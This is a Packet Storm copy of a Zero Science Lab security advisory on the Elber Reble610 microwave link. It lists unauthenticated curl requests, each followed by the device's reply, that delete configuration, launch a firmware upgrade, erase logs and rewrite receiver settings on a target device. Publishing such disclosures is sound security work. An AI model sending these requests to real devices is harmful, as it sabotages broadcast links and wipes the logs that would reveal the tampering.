what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Insecure Direct Object Reference

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Insecure Direct Object Reference
Posted Apr 18, 2024
Authored by LiquidWorm | Site zeroscience.mk

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link suffers from an unauthenticated device configuration and client-side hidden functionality disclosure vulnerability.

tags | exploit
SHA-256 | 67d45ea700951600af178d1f85ea7278844c202822bf7c0658dfaf91b222e908

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Insecure Direct Object Reference

Change Mirror Download

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 0.01 Revision 0

Summary: The REBLE610 features an accurate hardware design, absence of
internal cabling and full modularity. The unit is composed by a basic
chassis with 4 extractable boards which makes maintenance and critical
operations, like frequency modification, easy and efficient. The modular
approach has brought to the development of the digital processing module
(containing modulator, demodulator and data interface) and the RF module
(containing Transmitter, Receiver and channel filters). From an RF point
of view, the new transmission circuitry is able to guarantee around 1 Watt
with every modulation scheme, introducing, in addition, wideband precorrection
(up to 1GHz depending on frequency band).

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2024-5819
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close